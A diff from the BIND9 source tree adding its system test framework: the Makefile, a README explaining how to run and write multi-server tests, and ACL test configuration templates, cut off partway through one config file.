diff options
Diffstat (limited to '')
2465 files changed, 185014 insertions, 0 deletions
diff --git a/bin/tests/system/Makefile.in b/bin/tests/system/Makefile.in new file mode 100644 index 0000000..7b8b42c --- /dev/null +++ b/bin/tests/system/Makefile.in @@ -0,0 +1,108 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +srcdir = @srcdir@ +VPATH = @srcdir@ +top_srcdir = @top_srcdir@ + +VERSION=@BIND9_VERSION@ + +@BIND9_MAKE_INCLUDES@ + +SUBDIRS = dlzexternal dyndb pipelined rndc rpz rsabigexponent tkey + +CINCLUDES = ${ISC_INCLUDES} \ + ${DNS_INCLUDES} \ + ${ISCCFG_INCLUDES} \ + ${IRS_INCLUDES} + +CDEFINES = @USE_GSSAPI@ @CONTRIB_DLZ@ +CWARNINGS = + +ISCLIBS = ../../../lib/isc/libisc.@A@ @NO_LIBTOOL_ISCLIBS@ +DNSLIBS = ../../../lib/dns/libdns.@A@ @NO_LIBTOOL_DNSLIBS@ +ISCCFGLIBS = ../../../lib/isccfg/libisccfg.@A@ +IRSLIBS = ../../../lib/irs/libirs.@A@ + +ISCDEPLIBS = ../../../lib/isc/libisc.@A@ +DNSDEPLIBS = ../../../lib/dns/libdns.@A@ +ISCCFGDEPLIBS = ../../../lib/isccfg/libisccfg.@A@ +IRSDEPLIBS = ../../../lib/irs/libirs.@A@ + +DEPLIBS = ${IRSDEPLIBS} ${ISCCFGDEPLIBS} ${DNSDEPLIBS} ${ISCDEPLIBS} + +LIBS = ${IRSLIBS} ${ISCCFGLIBS} ${DNSLIBS} ${ISCLIBS} @LIBS@ + +OBJS = feature-test.@O@ resolve.@O@ +SRCS = feature-test.c resolve.c + +TARGETS = feature-test@EXEEXT@ resolve@EXEEXT@ + +@BIND9_MAKE_RULES@ + +subdirs: ${TARGETS} + +feature-test@EXEEXT@: feature-test.@O@ + ${LIBTOOL_MODE_LINK} ${PURIFY} ${CC} ${CFLAGS} ${LDFLAGS} -o $@ feature-test.@O@ ${ISCLIBS} ${LIBS} + +resolve@EXEEXT@: resolve.@O@ ${DEPLIBS} + ${LIBTOOL_MODE_LINK} ${PURIFY} ${CC} ${CFLAGS} ${LDFLAGS} -o $@ \ + resolve.@O@ ${LIBS} + +# Running the scripts below is bypassed when a separate build directory is +# used. + +# Produce intermediate makefile that assigns unique port numbers to each +# parallel test. The start port number of 5,000 is arbitrary - it must just +# be greater than the highest privileged port, 1024. +# +# Test names need to be sanitized because Solaris make does not like +# underscores in target names and requires explicit differentiation +# between a target name and a directory name (.PHONY is not supported). + +.PHONY: parallel.mk + +parallel.mk: + $(SHELL) parallel.sh > parallel.mk + +# Targets to run the tests. + +test: parallel.mk subdirs + @$(MAKE) -f parallel.mk check + @$(SHELL) ./runsequential.sh + @$(SHELL) ./testsummary.sh + +check: test + +# Other targets: +# +# testclean - delete files generated by running tests. +# clean - testclean + also delete files built for the tests by "make". +# distclean - clean + also delete test-related files generated by "configure". + +testclean clean distclean:: + if test -f ./cleanall.sh; then $(SHELL) ./cleanall.sh; fi + rm -f systests.output + rm -f random.data + rm -f parallel.mk + +clean distclean:: + rm -f ${TARGETS} + rm -f ${OBJS} + +distclean:: + rm -f conf.sh + +installdirs: + +install:: + +uninstall:: diff --git a/bin/tests/system/README b/bin/tests/system/README new file mode 100644 index 0000000..fc9294d --- /dev/null +++ b/bin/tests/system/README @@ -0,0 +1,724 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +Introduction +=== +This directory holds a simple test environment for running bind9 system tests +involving multiple name servers. + +With the exception of "common" (which holds configuration information common to +multiple tests) and "win32" (which holds files needed to run the tests in a +Windows environment), each directory holds a set of scripts and configuration +files to test different parts of BIND. The directories are named for the +aspect of BIND they test, for example: + + dnssec/ DNSSEC tests + forward/ Forwarding tests + glue/ Glue handling tests + +etc. + +Typically each set of tests sets up 2-5 name servers and then performs one or +more tests against them. Within the test subdirectory, each name server has a +separate subdirectory containing its configuration data. These subdirectories +are named "nsN" or "ansN" (where N is a number between 1 and 8, e.g. ns1, ans2 +etc.) + +The tests are completely self-contained and do not require access to the real +DNS. Generally, one of the test servers (usually ns1) is set up as a root +nameserver and is listed in the hints file of the others. + + +Preparing to Run the Tests +=== +To enable all servers to run on the same machine, they bind to separate virtual +IP addresses on the loopback interface. ns1 runs on 10.53.0.1, ns2 on +10.53.0.2, etc. Before running any tests, you must set up these addresses by +running the command + + sh ifconfig.sh up + +as root. The interfaces can be removed by executing the command: + + sh ifconfig.sh down + +... also as root. + +The servers use unprivileged ports (above 1024) instead of the usual port 53, +so they can be run without root privileges once the interfaces have been set +up. + + +Note for MacOS Users +--- +If you wish to make the interfaces survive across reboots, copy +org.isc.bind.system and org.isc.bind.system.plist to /Library/LaunchDaemons +then run + + launchctl load /Library/LaunchDaemons/org.isc.bind.system.plist + +... as root. + + +Running the System Tests +=== + +Running an Individual Test +--- +The tests can be run individually using the following command: + + sh run.sh [flags] <test-name> [<test-arguments>] + +e.g. + + sh run.sh [flags] notify + +Optional flags are: + + -k Keep servers running after the test completes. Each test + usually starts a number of nameservers, either instances + of the "named" being tested, or custom servers (written in + Python or Perl) that feature test-specific behavior. The + servers are automatically started before the test is run + and stopped after it ends. This flag leaves them running + at the end of the test, so that additional queries can be + sent by hand. To stop the servers afterwards, use the + command "sh stop.sh <test-name>". + + -n Noclean - do not remove the output files if the test + completes successfully. By default, files created by the + test are deleted if it passes; they are not deleted if the + test fails. + + -p <number> Sets the range of ports used by the test. A block of 100 + ports is available for each test, the number given to the + "-p" switch being the number of the start of that block + (e.g. "-p 7900" will mean that the test is able to use + ports 7900 through 7999). If not specified, the test will + have ports 5000 to 5099 available to it. + +Arguments are: + + test-name Mandatory. The name of the test, which is the name of the + subdirectory in bin/tests/system holding the test files. + + test-arguments Optional arguments that are passed to each of the test's + scripts. + + +Running All The System Tests +--- +To run all the system tests, enter the command: + + sh runall.sh [-c] [-n] [numproc] + +The optional flag "-c" forces colored output (by default system test output is +not printed in color due to run.sh being piped through "tee"). + +The optional flag "-n" has the same effect as it does for "run.sh" - it causes +the retention of all output files from all tests. + +The optional "numproc" argument specifies the maximum number of tests that can +run in parallel. The default is 1, which means that all of the tests run +sequentially. If greater than 1, up to "numproc" tests will run simultaneously, +new tests being started as tests finish. Each test will get a unique set of +ports, so there is no danger of tests interfering with one another. Parallel +running will reduce the total time taken to run the BIND system tests, but will +mean that the output from all the tests sent to the screen will be mixed up +with one another. However, the systests.output file produced at the end of the +run (in the bin/tests/system directory) will contain the output from each test +in sequential order. + +Note that it is not possible to pass arguments to tests though the "runall.sh" +script. + +A run of all the system tests can also be initiated via make: + + make [-j numproc] test + +In this case, retention of the output files after a test completes successfully +is specified by setting the environment variable SYSTEMTEST_NO_CLEAN to 1 prior +to running make, e.g. + + SYSTEMTEST_NO_CLEAN=1 make [-j numproc] test + +while setting environment variable SYSTEMTEST_FORCE_COLOR to 1 forces system +test output to be printed in color. + + +Running Multiple System Test Suites Simultaneously +--- +In some cases it may be desirable to have multiple instances of the system test +suite running simultaneously (e.g. from different terminal windows). To do +this: + +1. Each installation must have its own directory tree. The system tests create +files in the test directories, so separate directory trees are required to +avoid interference between the same test running in the different +installations. + +2. For one of the test suites, the starting port number must be specified by +setting the environment variable STARTPORT before starting the test suite. +Each test suite comprises about 100 tests, each being allocated a set of 100 +ports. The port ranges for each test are allocated sequentially, so each test +suite requires about 10,000 ports to itself. By default, the port allocation +starts at 5,000. So the following set of commands: + + Terminal Window 1: + cd <installation-1>/bin/tests/system + sh runall.sh 4 + + Terminal Window 2: + cd <installation-2>/bin/tests/system + STARTPORT=20000 sh runall.sh 4 + +... will start the test suite for installation-1 using the default base port +of 5,000, so the test suite will use ports 5,000 through 15,000 (or there +abouts). The use of "STARTPORT=20000" to prefix the run of the test suite for +installation-2 will mean the test suite uses ports 20,000 through 30,000 or so. + + +Format of Test Output +--- +All output from the system tests is in the form of lines with the following +structure: + + <letter>:<test-name>:<message> [(<number>)] + +e.g. + + I:catz:checking that dom1.example is not served by master (1) + +The meanings of the fields are as follows: + +<letter> +This indicates the type of message. This is one of: + + S Start of the test + A Start of test (retained for backwards compatibility) + T Start of test (retained for backwards compatibility) + E End of the test + I Information. A test will typically output many of these messages + during its run, indicating test progress. Note that such a message may + be of the form "I:testname:failed", indicating that a sub-test has + failed. + R Result. Each test will result in one such message, which is of the + form: + + R:<test-name>:<result> + + where <result> is one of: + + PASS The test passed + FAIL The test failed + SKIPPED The test was not run, usually because some + prerequisites required to run the test are missing. + +<test-name> +This is the name of the test from which the message emanated, which is also the +name of the subdirectory holding the test files. + +<message> +This is text output by the test during its execution. + +(<number>) +If present, this will correlate with a file created by the test. The tests +execute commands and route the output of each command to a file. The name of +this file depends on the command and the test, but will usually be of the form: + + <command>.out.<suffix><number> + +e.g. nsupdate.out.test28, dig.out.q3. This aids diagnosis of problems by +allowing the output that caused the problem message to be identified. + + +Re-Running the Tests +--- +If there is a requirement to re-run a test (or the entire test suite), the +files produced by the tests should be deleted first. Normally, these files are +deleted if the test succeeds but are retained on error. The run.sh script +automatically calls a given test's clean.sh script before invoking its setup.sh +script. + +Deletion of the files produced by the set of tests (e.g. after the execution +of "runall.sh") can be carried out using the command: + + sh cleanall.sh + +or + + make testclean + +(Note that the Makefile has two other targets for cleaning up files: "clean" +will delete all the files produced by the tests, as well as the object and +executable files used by the tests. "distclean" does all the work of "clean" +as well as deleting configuration files produced by "configure".) + + +Developer Notes +=== +This section is intended for developers writing new tests. + + +Overview +--- +As noted above, each test is in a separate directory. To interact with the +test framework, the directories contain the following standard files: + +prereq.sh Run at the beginning to determine whether the test can be run at + all; if not, we see a R:SKIPPED result. This file is optional: + if not present, the test is assumed to have all its prerequisites + met. + +setup.sh Run after prereq.sh, this sets up the preconditions for the tests. + Although optional, virtually all tests will require such a file to + set up the ports they should use for the test. + +tests.sh Runs the actual tests. This file is mandatory. + +clean.sh Run at the end to clean up temporary files, but only if the test + was completed successfully and its running was not inhibited by the + "-n" switch being passed to "run.sh". Otherwise the temporary + files are left in place for inspection. + +ns<N> These subdirectories contain test name servers that can be queried + or can interact with each other. The value of N indicates the + address the server listens on: for example, ns2 listens on + 10.53.0.2, and ns4 on 10.53.0.4. All test servers use an + unprivileged port, so they don't need to run as root. These + servers log at the highest debug level and the log is captured in + the file "named.run". + +ans<N> Like ns[X], but these are simple mock name servers implemented in + Perl or Python. They are generally programmed to misbehave in ways + named would not so as to exercise named's ability to interoperate + with badly behaved name servers. + + +Port Usage +--- +In order for the tests to run in parallel, each test requires a unique set of +ports. These are specified by the "-p" option passed to "run.sh", which sets +environment variables that the scripts listed above can reference. + +The convention used in the system tests is that the number passed is the start +of a range of 100 ports. The test is free to use the ports as required, +although the first ten ports in the block are named and generally tests use the +named ports for their intended purpose. The names of the environment variables +are: + + PORT Number to be used for the query port. + CONTROLPORT Number to be used as the RNDC control port. + EXTRAPORT1 - EXTRAPORT8 Eight port numbers that can be used as needed. + +Two other environment variables are defined: + + LOWPORT The lowest port number in the range. + HIGHPORT The highest port number in the range. + +Since port ranges usually start on a boundary of 10, the variables are set such +that the last digit of the port number corresponds to the number of the +EXTRAPORTn variable. For example, if the port range were to start at 5200, the +port assignments would be: + + PORT = 5200 + EXTRAPORT1 = 5201 + : + EXTRAPORT8 = 5208 + CONTROLPORT = 5209 + LOWPORT = 5200 + HIGHPORT = 5299 + +When running tests in parallel (i.e. giving a value of "numproc" greater than 1 +in the "make" or "runall.sh" commands listed above), it is guaranteed that each +test will get a set of unique port numbers. + + +Writing a Test +--- +The test framework requires up to four shell scripts (listed above) as well as +a number of nameserver instances to run. Certain expectations are put on each +script: + + +General +--- +1. Each of the four scripts will be invoked with the command + + (cd <test-directory> ; sh <script> [<arguments>] ) + +... so that working directory when the script starts executing is the test +directory. + +2. Arguments can be only passed to the script if the test is being run as a +one-off with "run.sh". In this case, everything on the command line after the +name of the test is passed to each script. For example, the command: + + sh run.sh -p 12300 mytest -D xyz + +... will run "mytest" with a port range of 12300 to 12399. Each of the +framework scripts provided by the test will be invoked using the remaining +arguments, e.g.: + + (cd mytest ; sh prereq.sh -D xyz) + (cd mytest ; sh setup.sh -D xyz) + (cd mytest ; sh tests.sh -D xyz) + (cd mytest ; sh clean.sh -D xyz) + +No arguments will be passed to the test scripts if the test is run as part of +a run of the full test suite (e.g. the tests are started with "runall.sh"). + +3. Each script should start with the following lines: + + SYSTEMTESTTOP=.. + . $SYSTEMTESTTOP/conf.sh + +"conf.sh" defines a series of environment variables together with functions +useful for the test scripts. (conf.sh.win32 is the Windows equivalent of this +file.) + + +prereq.sh +--- +As noted above, this is optional. If present, it should check whether specific +software needed to run the test is available and/or whether BIND has been +configured with the appropriate options required. + + * If the software required to run the test is present and the BIND + configure options are correct, prereq.sh should return with a status code + of 0. + + * If the software required to run the test is not available and/or BIND + has not been configured with the appropriate options, prereq.sh should + return with a status code of 1. + + * If there is some other problem (e.g. prerequisite software is available + but is not properly configured), a status code of 255 should be returned. + + +setup.sh +--- +This is responsible for setting up the configuration files used in the test. + +To cope with the varying port number, ports are not hard-coded into +configuration files (or, for that matter, scripts that emulate nameservers). +Instead, setup.sh is responsible for editing the configuration files to set the +port numbers. + +To do this, configuration files should be supplied in the form of templates +containing tokens identifying ports. The tokens have the same name as the +environment variables listed above, but are prefixed and suffixed by the "@" +symbol. For example, a fragment of a configuration file template might look +like: + + controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; + }; + + options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + allow-new-zones yes; + }; + +setup.sh should copy the template to the desired filename using the +"copy_setports" shell function defined in "conf.sh", i.e. + + copy_setports ns1/named.conf.in ns1/named.conf + +This replaces the tokens @PORT@, @CONTROLPORT@, @EXTRAPORT1@ through +@EXTRAPORT8@ with the contents of the environment variables listed above. +setup.sh should do this for all configuration files required when the test +starts. + +("setup.sh" should also use this method for replacing the tokens in any Perl or +Python name servers used in the test.) + + +tests.sh +--- +This is the main test file and the contents depend on the test. The contents +are completely up to the developer, although most test scripts have a form +similar to the following for each sub-test: + + 1. n=`expr $n + 1` + 2. echo_i "prime cache nodata.example ($n)" + 3. ret=0 + 4. $DIG -p ${PORT} @10.53.0.1 nodata.example TXT > dig.out.test$n + 5. grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 + 6. grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 + 7. if [ $ret != 0 ]; then echo_i "failed"; fi + 8. status=`expr $status + $ret` + +1. Increment the test number "n" (initialized to zero at the start of the + script). + +2. Indicate that the sub-test is about to begin. Note that "echo_i" instead + of "echo" is used. echo_i is a function defined in "conf.sh" which will + prefix the message with "I:<testname>:", so allowing the output from each + test to be identified within the output. The test number is included in + the message in order to tie the sub-test with its output. + +3. Initialize return status. + +4 - 6. Carry out the sub-test. In this case, a nameserver is queried (note + that the port used is given by the PORT environment variable, which was set + by the inclusion of the file "conf.sh" at the start of the script). The + output is routed to a file whose suffix includes the test number. The + response from the server is examined and, in this case, if the required + string is not found, an error is indicated by setting "ret" to 1. + +7. If the sub-test failed, a message is printed. "echo_i" is used to print + the message to add the prefix "I:<test-name>:" before it is output. + +8. "status", used to track how many of the sub-tests have failed, is + incremented accordingly. The value of "status" determines the status + returned by "tests.sh", which in turn determines whether the framework + prints the PASS or FAIL message. + +Regardless of this, rules that should be followed are: + +a. Use the environment variables set by conf.sh to determine the ports to use + for sending and receiving queries. + +b. Use a counter to tag messages and to associate the messages with the output + files. + +c. Store all output produced by queries/commands into files. These files + should be named according to the command that produced them, e.g. "dig" + output should be stored in a file "dig.out.<suffix>", the suffix being + related to the value of the counter. + +d. Use "echo_i" to output informational messages. + +e. Retain a count of test failures and return this as the exit status from + the script. + + +clean.sh +--- +The inverse of "setup.sh", this is invoked by the framework to clean up the +test directory. It should delete all files that have been created by the test +during its run. + + +Starting Nameservers +--- +As noted earlier, a system test will involve a number of nameservers. These +will be either instances of named, or special servers written in a language +such as Perl or Python. + +For the former, the version of "named" being run is that in the "bin/named" +directory in the tree holding the tests (i.e. if "make test" is being run +immediately after "make", the version of "named" used is that just built). The +configuration files, zone files etc. for these servers are located in +subdirectories of the test directory named "nsN", where N is a small integer. +The latter are special nameservers, mostly used for generating deliberately bad +responses, located in subdirectories named "ansN" (again, N is an integer). +In addition to configuration files, these directories should hold the +appropriate script files as well. + +Note that the "N" for a particular test forms a single number space, e.g. if +there is an "ns2" directory, there cannot be an "ans2" directory as well. +Ideally, the directory numbers should start at 1 and work upwards. + +When running a test, the servers are started using "start.sh" (which is nothing +more than a wrapper for start.pl). The options for "start.pl" are documented +in the header for that file, so will not be repeated here. In summary, when +invoked by "run.sh", start.pl looks for directories named "nsN" or "ansN" in +the test directory and starts the servers it finds there. + + +"named" Command-Line Options +--- +By default, start.pl starts a "named" server with the following options: + + -c named.conf Specifies the configuration file to use (so by implication, + each "nsN" nameserver's configuration file must be called + named.conf). + + -d 99 Sets the maximum debugging level. + + -D <name> The "-D" option sets a string used to identify the + nameserver in a process listing. In this case, the string + is the name of the subdirectory. + + -g Runs the server in the foreground and logs everything to + stderr. + + -m record,size,mctx + Turns on these memory usage debugging flags. + + -U 4 Uses four listeners. + + -X named.lock Acquires a lock on this file in the "nsN" directory, so + preventing multiple instances of this named running in this + directory (which could possibly interfere with the test). + +All output is sent to a file called "named.run" in the nameserver directory. + +The options used to start named can be altered. There are three ways of doing +this. "start.pl" checks the methods in a specific order: if a check succeeds, +the options are set and any other specification is ignored. In order, these +are: + +1. Specifying options to "start.sh"/"start.pl" after the name of the test +directory, e.g. + + sh start.sh reclimit ns1 -- "-c n.conf -d 43" + +(This is only really useful when running tests interactively.) + +2. Including a file called "named.args" in the "nsN" directory. If present, +the contents of the first non-commented, non-blank line of the file are used as +the named command-line arguments. The rest of the file is ignored. + +3. Tweaking the default command line arguments with "-T" options. This flag is +used to alter the behavior of BIND for testing and is not documented in the +ARM. The presence of certain files in the "nsN" directory adds flags to +the default command line (the content of the files is irrelevant - it +is only the presence that counts): + + named.noaa Appends "-T noaa" to the command line, which causes + "named" to never set the AA bit in an answer. + + named.dropedns Adds "-T dropedns" to the command line, which causes + "named" to recognise EDNS options in messages, but drop + messages containing them. + + named.maxudp1460 Adds "-T maxudp1460" to the command line, setting the + maximum UDP size handled by named to 1460. + + named.maxudp512 Adds "-T maxudp512" to the command line, setting the + maximum UDP size handled by named to 512. + + named.noedns Appends "-T noedns" to the command line, which disables + recognition of EDNS options in messages. + + named.notcp Adds "-T notcp", which disables TCP in "named". + + named.soa Appends "-T nosoa" to the command line, which disables + the addition of SOA records to negative responses (or to + the additional section if the response is triggered by RPZ + rewriting). + +Starting Other Nameservers +--- +In contrast to "named", nameservers written in Perl or Python (whose script +file should have the name "ans.pl" or "ans.py" respectively) are started with a +fixed command line. In essence, the server is given the address and nothing +else. + +(This is not strictly true: Python servers are provided with the number of the +query port to use. Altering the port used by Perl servers currently requires +creating a template file containing the "@PORT@" token, and having "setup.sh" +substitute the actual port being used before the test starts.) + + +Stopping Nameservers +--- +As might be expected, the test system stops nameservers with the script +"stop.sh", which is little more than a wrapper for "stop.pl". Like "start.pl", +the options available are listed in the file's header and will not be repeated +here. + +In summary though, the nameservers for a given test, if left running by +specifying the "-k" flag to "run.sh" when the test is started, can be stopped +by the command: + + sh stop.sh <test-name> [server] + +... where if the server (e.g. "ns1", "ans3") is not specified, all servers +associated with the test are stopped. + + +Adding a Test to the System Test Suite +--- +Once a test has been created, the following files should be edited: + +* conf.sh.in The name of the test should be added to the PARALLELDIRS or +SEQUENTIALDIRS variables as appropriate. The former is used for tests that +can run in parallel with other tests, the latter for tests that are unable to +do so. + +* conf.sh.win32 This is the Windows equivalent of conf.sh.in. The name of the +test should be added to the PARALLELDIRS or SEQUENTIALDIRS variables as +appropriate. + +* Makefile.in The name of the test should be added to one of the the PARALLEL +or SEQUENTIAL variables. + +(It is likely that a future iteration of the system test suite will remove the +need to edit multiple files to add a test.) + + +Valgrind +--- +When running system tests, named can be run under Valgrind. The output from +Valgrind are sent to per-process files that can be reviewed after the test has +completed. To enable this, set the USE_VALGRIND environment variable to +"helgrind" to run the Helgrind tool, or any other value to run the Memcheck +tool. To use "helgrind" effectively, build BIND with --disable-atomic. + + +Maintenance Notes +=== +This section is aimed at developers maintaining BIND's system test framework. + +Notes on Parallel Execution +--- +Although execution of an individual test is controlled by "run.sh", which +executes the above shell scripts (and starts the relevant servers) for each +test, the running of all tests in the test suite is controlled by the Makefile. +("runall.sh" does little more than invoke "make" on the Makefile.) + +All system tests are capable of being run in parallel. For this to work, each +test needs to use a unique set of ports. To avoid the need to define which +tests use which ports (and so risk port clashes as further tests are added), +the ports are assigned when the tests are run. This is achieved by having the +"test" target in the Makefile depend on "parallel.mk". That file is created +when "make check" is run, and contains a target for each test of the form: + + <test-name>: + @$(SHELL) run.sh -p <baseport> <test-name> + +The <baseport> is unique and the values of <baseport> for each test are +separated by at least 100 ports. + + +Cleaning Up From Tests +--- +When a test is run, up to three different types of files are created: + +1. Files generated by the test itself, e.g. output from "dig" and "rndc", are +stored in the test directory. + +2. Files produced by named which may not be cleaned up if named exits +abnormally, e.g. core files, PID files etc., are stored in the test directory. + +3. A file "test.output.<test-name>" containing the text written to stdout by the +test is written to bin/tests/system/. This file is only produced when the test +is run as part of the entire test suite (e.g. via "runall.sh"). + +If the test fails, all these files are retained. But if the test succeeds, +they are cleaned up at different times: + +1. Files generated by the test itself are cleaned up by the test's own +"clean.sh", which is called from "run.sh". + +2. Files that may not be cleaned up if named exits abnormally can be removed +using the "cleanall.sh" script. + +3. "test.output.*" files are deleted when the test suite ends. At this point, +the file "testsummary.sh" is called which concatenates all the "test.output.*" +files into a single "systests.output" file before deleting them. diff --git a/bin/tests/system/acl/clean.sh b/bin/tests/system/acl/clean.sh new file mode 100644 index 0000000..c8d26cc --- /dev/null +++ b/bin/tests/system/acl/clean.sh @@ -0,0 +1,26 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after zone transfer tests. +# + +rm -f dig.out.* +rm -f ns2/example.db ns2/tsigzone.db ns2/example.db.jnl +rm -f */named.conf +rm -f */named.memstats +rm -f */named.run +rm -f ns*/named.lock +rm -f ns*/_default.nzf +rm -f ns*/_default.nzd* +rm -f ns*/managed-keys.bind* ns*/*.mkeys* diff --git a/bin/tests/system/acl/ns2/named1.conf.in b/bin/tests/system/acl/ns2/named1.conf.in new file mode 100644 index 0000000..745048a --- /dev/null +++ b/bin/tests/system/acl/ns2/named1.conf.in @@ -0,0 +1,61 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + ixfr-from-differences yes; + check-integrity no; +}; + +key one { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +key two { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "tsigzone" { + type primary; + file "tsigzone.db"; + allow-transfer { !key one; any; }; +}; diff --git a/bin/tests/system/acl/ns2/named2.conf.in b/bin/tests/system/acl/ns2/named2.conf.in new file mode 100644 index 0000000..21aa991 --- /dev/null +++ b/bin/tests/system/acl/ns2/named2.conf.in @@ -0,0 +1,65 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + ixfr-from-differences yes; + check-integrity no; +}; + +key one { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +key two { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "tsigzone" { + type primary; + file "tsigzone.db"; + /* + * 0a00::/8 and 10/8 are the same bits, but different address + * families. This should *not* match IPv4 queries from 10.*. + */ + allow-transfer { 0a00::/8; !10/8; key one; }; +}; diff --git a/bin/tests/system/acl/ns2/named3.conf.in b/bin/tests/system/acl/ns2/named3.conf.in new file mode 100644 index 0000000..3208c92 --- /dev/null +++ b/bin/tests/system/acl/ns2/named3.conf.in @@ -0,0 +1,74 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + ixfr-from-differences yes; + check-integrity no; +}; + +key one { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +key two { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +key three { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +acl reject { + !key one; !key two; any; +}; + +acl accept { + 10.53.0.1; 10.53.0.2; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "tsigzone" { + type primary; + file "tsigzone.db"; + allow-transfer { !reject; accept; }; +}; diff --git a/bin/tests/system/acl/ns2/named4.conf.in b/bin/tests/system/acl/ns2/named4.conf.in new file mode 100644 index 0000000..14e82ed --- /dev/null +++ b/bin/tests/system/acl/ns2/named4.conf.in @@ -0,0 +1,73 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + ixfr-from-differences yes; + check-integrity no; +}; + +key one { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +key two { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +acl rejectkeys { + !key one; !key two; any; +}; + +acl rejectaddrs { + !10.53.0.1; !10.53.0.2; any; +}; + +acl check1 { !key one; 10.53.0.1; }; + +acl check2 { !key two; 10.53.0.2; }; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "tsigzone" { + type primary; + file "tsigzone.db"; + allow-transfer { !rejectkeys; !rejectaddrs; !check1; !check2; any; }; +}; diff --git a/bin/tests/system/acl/ns2/named5.conf.in b/bin/tests/system/acl/ns2/named5.conf.in new file mode 100644 index 0000000..f43f33c --- /dev/null +++ b/bin/tests/system/acl/ns2/named5.conf.in @@ -0,0 +1,63 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the 